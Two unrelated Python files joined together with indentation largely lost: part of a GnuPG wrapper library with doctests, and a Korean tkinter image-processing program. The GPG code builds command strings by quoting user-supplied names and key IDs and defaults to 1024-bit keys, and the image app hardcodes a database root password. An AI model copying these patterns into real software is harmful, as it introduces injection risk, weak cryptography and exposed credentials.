def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f)
f.close()
return result
def verify_file(self, file, data_filename=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(fn)
args.append('"%s"' % data_filename)
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> result = gpg.recv_keys('pgp.mit.edu', '3FF0DB166A7476EA')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', keyserver, '--recv-keys']
args.extend(keyids)
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ['--batch --delete-%s "%s"' % (which, fingerprints)]
result = self.result_map['delete'](self)
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(['"%s"' % k for k in keyids])
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['delete'](self) # any result will do
self._collect_output(p, result, stdin=p.stdin)
logger.debug('export_keys result: %r', result.data)
return result.data.decode(self.encoding, self.decode_errors)
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which,)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = self.result_map['list'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr sub'.split()
for line in lines:
if self.verbose:
print(line)
logger.debug("line: %r", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: [email protected]
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
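# For example (a sketch, not in the original), the keyword form
#     gen_key_input(key_type='DSA', key_length=1024, name_real='Joe Tester',
#                   name_email='[email protected]', passphrase='abc')
# yields a control block much like the second sample above (minus the
# subkey lines), ending with "%commit".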
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False):
"Encrypt the message read from the file-like object 'file'"
if symmetric:
args = ['--symmetric']
else:
args = ['--encrypt']
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient "%s"' % recipient)
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if sign:
args.append('--sign --default-key "%s"' % sign)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'need passphrase'
True
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status == 'need passphrase'
True
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == print1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
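# --- Usage sketch (not part of the original module) ---
# A minimal round trip mirroring the doctests above; it assumes a 'gpg'
# binary is on the PATH and that './keys' can be used as the keyring home.
if __name__ == '__main__':
    gpg = GPG(gnupghome='keys')
    key = gpg.gen_key(gpg.gen_key_input(passphrase='foo'))
    encrypted = gpg.encrypt('hello', key.fingerprint)
    decrypted = gpg.decrypt(str(encrypted), passphrase='foo')
    assert str(decrypted) == 'hello'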
|
myVision_without_np.py
|
import tkinter
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
import numpy as np
import struct
import matplotlib.pyplot as plt
import threading
import time
from PIL import Image, ImageFilter, ImageEnhance, ImageOps
import colorsys
import random
import tempfile
import pymysql
import csv
#######################
#### Class definitions ####
#######################
class Window(tkinter.Tk):  # inherits tkinter.Tk
def __init__(self, H=500, W=500):
super(Window, self).__init__()
self.canvas = None
self.inImage = None
self.outImage = None
self.photo = None
self.H = H
self.W = W
self.panYN = N
self.viewX = W
self.viewY = H
self.sx = 0
self.sy = 0
self.ex = W-1
self.ey = H-1
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Canvas(tkinter.Canvas):  # inherits tkinter.Canvas
def __init__(self, window, height=500, width=500):
super(Canvas, self).__init__(window, height=height, width=width)
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Paper:
def __init__(self, window: Canvas):
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class __Image:
def __init__(self, H=-1, W=-1):
self.H = H
self.W = W
self.filename = ''
self.mem = None
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
def malloc(self, initValue: int = 0) -> list:
"""
Allocate memory based on the image's height and width and return it as a nested list.
:param initValue:
:return:
"""
if self.H == -1 or self.W == -1:
print("set H and W!! @ %s" % __class__)
exit(-1)
retMemory = []
for RGB in range(3):
retMemory.append([])
for i in range(self.H):
retMemory[RGB].append([])
for k in range(self.W):
retMemory[RGB][i].append(initValue)
self.mem = retMemory
class InImage(__Image):
def __init__(self, H=-1, W=-1):
super(InImage, self).__init__(H=H, W=W)
class OutImage(__Image):
def __init__(self, H=-1, W=-1):
super(OutImage, self).__init__(H=H, W=W)
#########################
#### Global variables ####
#########################
# image information
# mywin = MyWindow(H=500, W=500)
#
# mycan = MyCanvas(parent=mywin)
# mywin.canvas = mycan
#
# mypap = MyPaper(parent=mycan)
# mycan.paper = mypap
#
# inImage = InImage()
# outImage = OutImage()
# DB information
IP_ADDR = '192.168.56.106'
USER_NAME = 'root'
USER_PASS = '1234'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
# tkinter wrapping variables
BOTTOM = tkinter.BOTTOM
X = tkinter.X
SUNKEN = tkinter.SUNKEN
W = tkinter.W
# tkinter wrapping Classes
Label = tkinter.Label
Menu = tkinter.Menu
# color information
R = 0
G = 1
B = 2
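# A small sketch (not in the original) of the pixel layout the classes above
# allocate: mem[channel][row][col], with channels indexed by the R/G/B
# constants defined here.
#
#     img = InImage(H=2, W=3)
#     img.malloc()
#     img.mem[G][0][1] = 255   # green channel of the pixel at row 0, column 1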
#####################
#### Function definitions ####
#####################
def loadImage(window, fname: str) -> InImage:
photo = Image.open(fname)  # PIL image object
image = InImage()
## allocate memory
inW = photo.width
inH = photo.height
image.putSize(H=inH, W=inW)
image.malloc()
photoRGB = photo.convert('RGB')
for i in range(inH):
for k in range(inW):
r, g, b = photoRGB.getpixel((k, i))
image.mem[R][i][k] = r
image.mem[G][i][k] = g
image.mem[B][i][k] = b
window.photo = photo
return image
# Select an image file and load it into memory
def openImageColor(window):
filename = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename:
return
window.inImage = loadImage(window, filename)
equalImage(window)
def saveImageColor(window):
outImage = window.outImage
if not outImage:
return
outArray= []
for i in range(outImage.H):
tmpList = []
for k in range(outImage.W):
tup = tuple([outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k],])
tmpList.append(tup)
outArray.append(tmpList)
outArray = np.array(outArray)
savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension='.', filetypes=(("Image files", "*.png;*.jpg;*.bmp;*.tif"), ("All files", "*.*")))
if not saveFp:
return
savePhoto.save(saveFp.name)
print('Save~')
def displayImageColor(window):
canvas = window.canvas
outImage = window.outImage
if canvas:  # a canvas already exists from a previous run
canvas.destroy()
window.viewY, window.viewX = outImage.getSize()  # values come in (H, W) order
step = 1
window.geometry(str(int(window.viewX * 1.2)) + 'x' + str(int(window.viewY * 1.2)))  # resize the window to fit the image
canvas = Canvas(window, height=window.viewY, width=window.viewX)
window.canvas = canvas
paper = PhotoImage(height=window.viewY, width=window.viewX)
canvas.paper = paper
canvas.create_image(
(window.viewX // 2, window.viewY // 2), image=paper, state='normal')
## performance improvement
rgbStr = ''  # accumulates the color string for every pixel
for i in np.arange(0, outImage.H, step):
tmpStr = ''
for k in np.arange(0, outImage.W, step):
i = int(i)
k = int(k)
r, g, b = outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k]
tmpStr += ' #%02x%02x%02x' % (r, g, b)
rgbStr += '{' + tmpStr + '} '
paper.put(rgbStr)
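# The string handed to put() encodes one image row per braced group of Tk
# colors, e.g. '{ #ff0000 #00ff00} { #0000ff #ffffff} ' fills a 2x2 block
# in a single call, which is far faster than setting pixels one by one.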
# canvas.bind('<Button-1>', mouseClick)
# canvas.bind('<ButtonRelease-1>', mouseDrop)
canvas.pack(expand=1, anchor=CENTER)
# status.configure(text='Image info: ' + str(outW) + 'x' + str(outH))
# #########################################################
# ##### Computer vision (image processing) algorithms #####
# #########################################################
# # Identity (copy) algorithm
def equalImage(window):
inImage = window.inImage
outImage = window.outImage
    ###### Memory allocation ################
outH, outW = inImage.getSize()
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
def addImageColor(window):
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ## Allocate memory
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
    ### Actual computer vision algorithm ###
value = askinteger("밝게/어둡게", "값-->", minvalue=-255, maxvalue=255)
for RGB in range(3) :
for i in range(inImage.H) :
for k in range(inImage.W) :
if inImage.mem[RGB][i][k] + value > 255 :
outImage.mem[RGB][i][k] = 255
elif inImage.mem[RGB][i][k] + value < 0 :
outImage.mem[RGB][i][k] = 0
else :
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k] + value
#############################
window.outImage = outImage
displayImageColor(window)
def revImageColor(window):
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ## Allocate memory
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
    ### Actual computer vision algorithm ###
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = 255 - inImage.mem[RGB][i][k]
#############################
window.outImage = outImage
displayImageColor(window)
def paraImageColor(window):
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ## Allocate memory
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
    ### Actual computer vision algorithm ###
LUT = [0 for _ in range(256)]
for input in range(256):
LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2))
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = LUT[inImage.mem[RGB][i][k]]
#############################
window.outImage = outImage
displayImageColor(window)
def morphImageColor(window):
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ## Select the second image
filename2 = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename2:
return
inImage2 = loadImage(window, filename2)
    ## Allocate memory
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    # Fit to the smaller of the two images
if inImage.H > inImage2.H:
inImage.H = inImage2.H
if inImage.W > inImage2.W:
inImage.W = inImage2.W
import threading
import time
def morpFunc():
w1 = 1
w2 = 0
for _ in range(20):
for RGB in range(3) :
for i in range(inImage.H):
for k in range(inImage.W):
newValue = int(inImage.mem[RGB][i][k] * w1 + inImage2.mem[RGB][i][k] * w2)
if newValue > 255:
newValue = 255
elif newValue < 0:
newValue = 0
outImage.mem[RGB][i][k] = newValue
window.outImage = outImage
displayImageColor(window)
w1 -= 0.05;
w2 += 0.05
time.sleep(0.5)
threading.Thread(target=morpFunc).start()
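# Note: Tkinter widgets are not thread-safe, so updating the canvas from the worker thread
# above can misbehave on some platforms. A safer sketch (assuming the same window and
# outImage names) drives each blend step from the Tk event loop instead of sleeping:
#
#     def step(w1=1.0):
#         ...blend one frame into outImage and call displayImageColor(window)...
#         if w1 > 0.05:
#             window.after(500, step, w1 - 0.05)  # re-schedule instead of time.sleep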
def addSValuePillow(window):
photo = window.photo
inImage = window.inImage
    ## Important: determine the output image size ##
value = askfloat("","0~1~10")
photo2 = photo.copy()
photo2 = ImageEnhance.Color(photo2)
photo2 = photo2.enhance(value)
    ## Important: determine the output image size ##
outH = inImage.H
outW = inImage.W
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ## Temporary output --> final output
for i in range(outH):
for k in range(outW):
r, g, b = photo2.getpixel((k, i))
outImage.mem[R][i][k] = r
outImage.mem[G][i][k] = g
outImage.mem[B][i][k] = b
    window.outImage = outImage
    displayImageColor(window)
def addSValueHSV(window):
    ## Input RGB --> input HSV
    # Allocate memory
inImage = window.inImage
inH = inImage.H
inW = inImage.W
inImageHSV = InImage(H=inImage.H, W=inImage.W)
inImageHSV.malloc()
# RGB -> HSV
for i in range(inH):
for k in range(inW):
r, g, b = inImage.mem[R][i][k], inImage.mem[G][i][k], inImage.mem[B][i][k]
h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)
inImageHSV.mem[0][i][k], inImageHSV.mem[1][i][k], inImageHSV.mem[2][i][k] = h, s, v
    ## Important: determine the output image size ##
outH = inH
outW = inW
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
value = askfloat("", "-255~255") # -255 ~ 255
value /= 255
## HSV --> RGB
for i in range(outH):
for k in range(outW):
newS = inImageHSV.mem[1][i][k] + value
if newS < 0 :
newS = 0
elif newS > 1.0 :
newS = 1.0
h, s, v = inImageHSV.mem[0][i][k], newS, inImageHSV.mem[2][i][k]*255
r, g, b = colorsys.hsv_to_rgb(h, s, v)
outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k] = int(r), int(g), int(b)
window.outImage = outImage
displayImageColor(window)
# Binarization algorithm
def bwImage(window):
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
    ## Compute the average brightness of the image.
sumList = []
for RGB in range(3):
sumList.append(0)
for i in range(inImage.H):
for k in range(inImage.W):
sumList[RGB] += inImage.mem[RGB][i][k]
    avg = [s // (inImage.W * inImage.H) for s in sumList]
    grayAvg = sum(avg) // 3  # single gray threshold derived from the per-channel averages
    for i in range(inImage.H):
        for k in range(inImage.W):
            avgVal = int(sum([inImage.mem[tmp][i][k] for tmp in range(3)]) / 3)
            if avgVal > grayAvg:
newVal = 255
else:
newVal = 0
for RGB in range(3):
outImage.mem[RGB][i][k] = newVal
window.outImage = outImage
displayImageColor(window)
# Image reduction algorithm (block-mean)
def zoomOutImage2Color(window):
scale = askinteger("축소", "값-->", minvalue=2, maxvalue=16)
inImage = window.inImage
    ## Important: determine the output image size ##
outH = inImage.H//scale
outW = inImage.W//scale
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i//scale][k//scale] += inImage.mem[RGB][i][k]
for i in range(outImage.H):
for k in range(outImage.W):
outImage.mem[RGB][i][k] //= (scale*scale)
window.outImage = outImage
displayImageColor(window)
# Image enlargement algorithm (bilinear interpolation)
def zoomInImage2Color(window):
scale = askinteger("확대", "값-->", minvalue=2, maxvalue=8)
    ## Important: determine the output image size ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H*scale
outW = inImage.W*scale
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
    rH, rW, iH, iW = [0] * 4  # real-valued and integer source positions
    x, y = 0, 0  # fractional offsets between the real and integer positions
    C1, C2, C3, C4 = [0] * 4  # the four source pixels surrounding the target position
for RGB in range(3):
for i in range(outH):
for k in range(outW):
rH = i / scale
rW = k / scale
iH = int(rH)
iW = int(rW)
x = rW - iW
y = rH - iH
if 0 <= iH < inH-1 and 0 <= iW < inW-1 :
C1 = inImage.mem[RGB][iH][iW]
C2 = inImage.mem[RGB][iH][iW+1]
C3 = inImage.mem[RGB][iH+1][iW+1]
C4 = inImage.mem[RGB][iH+1][iW]
newValue = C1*(1-y)*(1-x) + C2*(1-y)* x+ C3*y*x + C4*y*(1-x)
outImage.mem[RGB][i][k] = int(newValue)
window.outImage = outImage
displayImageColor(window)
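# Worked example of the bilinear weights used above (illustrative numbers): with scale=2
# and output pixel (i=3, k=5), rH=1.5 and rW=2.5, so iH=1, iW=2, y=0.5, x=0.5, and each of
# the four neighbours C1..C4 contributes a weight of 0.25:
#     newValue = C1*0.25 + C2*0.25 + C3*0.25 + C4*0.25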
# Image rotation algorithm
def rotateImageColor(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
    ## Important: determine the output image size ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
radian = angle * math.pi / 180
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
xs = i
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < inImage.H and 0 <= yd < inImage.W:
outImage.mem[RGB][xd][yd] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
# Image rotation algorithm - about the center, backward mapping
def rotateImage2Color(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
    ## Important: determine the output image size ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
radian = angle * math.pi / 180
cx = inW//2
cy = inH//2
for RGB in range(3):
for i in range(outH) :
for k in range(outW) :
xs = i
ys = k
xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx
yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy
if 0 <= xd < outH and 0 <= yd < outW:
outImage.mem[RGB][xs][ys] = inImage.mem[RGB][xd][yd]
else:
outImage.mem[RGB][xs][ys] = 255
window.outImage = outImage
displayImageColor(window)
## Embossing
def embossImageRGB(window):
    ## Important: determine the output image size ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
    ###### Memory allocation ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
    ####### Actual computer vision algorithm #####
MSIZE = 3
mask = [ [-1, 0, 0],
[ 0, 0, 0],
[ 0, 0, 1] ]
    ## Allocate memory for the padded temporary input image
tmpInImage = InImage(H=inH + MSIZE - 1, W=inW + MSIZE - 1)
tmpInImage.malloc(initValue=127)
tmpOutImage = OutImage(H=outH, W=outW)
tmpOutImage.malloc()
    ## Original input --> temporary input
for RGB in range(3):
for i in range(inH):
for k in range(inW):
tmpInImage.mem[RGB][i+MSIZE//2][k+MSIZE//2] = inImage.mem[RGB][i][k]
        ## Convolution
for i in range(MSIZE//2, inH + MSIZE//2):
for k in range(MSIZE//2, inW + MSIZE//2):
                # Process one target pixel.
S = 0.0
for m in range(0, MSIZE):
for n in range(0, MSIZE):
S += mask[m][n]*tmpInImage.mem[RGB][i+m-MSIZE//2][k+n-MSIZE//2]
tmpOutImage.mem[RGB][i-MSIZE//2][k-MSIZE//2] = S
        ## Add 127 (optional brightness offset)
for i in range(outH):
for k in range(outW):
tmpOutImage.mem[RGB][i][k] += 127
        ## Temporary output --> final output
for i in range(outH):
for k in range(outW):
value = tmpOutImage.mem[RGB][i][k]
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage.mem[RGB][i][k] = int(value)
window.outImage = outImage
displayImageColor(window)
###################
#### Main code ####
###################
if __name__ == "__main__":
win = Window(H=500, W=500)
win.geometry("500x500")
win.title("컴퓨터 비전(딥러닝 기법) ver 0.04")
can = Canvas(win)
win.canvas = can
pap = Paper(can)
can.paper = pap
inImage = InImage()
win.inImage = inImage
outImage = OutImage()
win.outImage = outImage
status = Label(win, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(win)
win.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="파일 열기", command=lambda: openImageColor(win))
fileMenu.add_separator()
fileMenu.add_command(label="파일 저장", command=lambda: saveImageColor(win))
comVisionMenu1 = Menu(mainMenu)
mainMenu.add_cascade(label="화소점 처리", menu=comVisionMenu1)
comVisionMenu1.add_command(label="덧셈/뺄셈", command=lambda: addImageColor(win))
comVisionMenu1.add_command(label="반전하기", command=lambda: revImageColor(win))
comVisionMenu1.add_command(label="파라볼라", command=lambda: paraImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="모핑", command=lambda: morphImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="채도조절(Pillow)", command=lambda: addSValuePillow(win))
comVisionMenu1.add_command(label="채도조절(HSV)", command=lambda: addSValueHSV(win))
comVisionMenu2 = Menu(mainMenu)
mainMenu.add_cascade(label="통계", menu=comVisionMenu2)
comVisionMenu2.add_command(label="이진화", command=lambda: bwImage(win))
comVisionMenu2.add_command(label="축소(평균변환)", command=lambda: zoomOutImage2Color(win))
comVisionMenu2.add_command(label="확대(양선형보간)", command=lambda: zoomInImage2Color(win))
comVisionMenu2.add_separator()
# comVisionMenu2.add_command(label="히스토그램", command=histoImage)
# comVisionMenu2.add_command(label="히스토그램(내꺼)", command=histoImage2)
# comVisionMenu2.add_command(label="명암대비", command=stretchImage)
# comVisionMenu2.add_command(label="End-In탐색", command=endinImage)
# comVisionMenu2.add_command(label="평활화", command=equalizeImage)
comVisionMenu3 = Menu(mainMenu)
mainMenu.add_cascade(label="기하학 처리", menu=comVisionMenu3)
# comVisionMenu3.add_command(label="상하반전", command=upDownImageColor)
# comVisionMenu3.add_command(label="이동", command=moveImage)
# comVisionMenu3.add_command(label="축소", command=zoomOutImageColor)
# comVisionMenu3.add_command(label="확대", command=zoomInImageColor)
comVisionMenu3.add_command(label="회전1", command=lambda: rotateImageColor(win))
comVisionMenu3.add_command(label="회전2(중심,역방향)", command=lambda: rotateImage2Color(win))
comVisionMenu4 = Menu(mainMenu)
mainMenu.add_cascade(label="화소영역 처리", menu=comVisionMenu4)
comVisionMenu4.add_command(label="엠보싱(RGB)", command=lambda: embossImageRGB(win))
# comVisionMenu4.add_command(label="엠보싱(Pillow제공)", command=embossImagePillow)
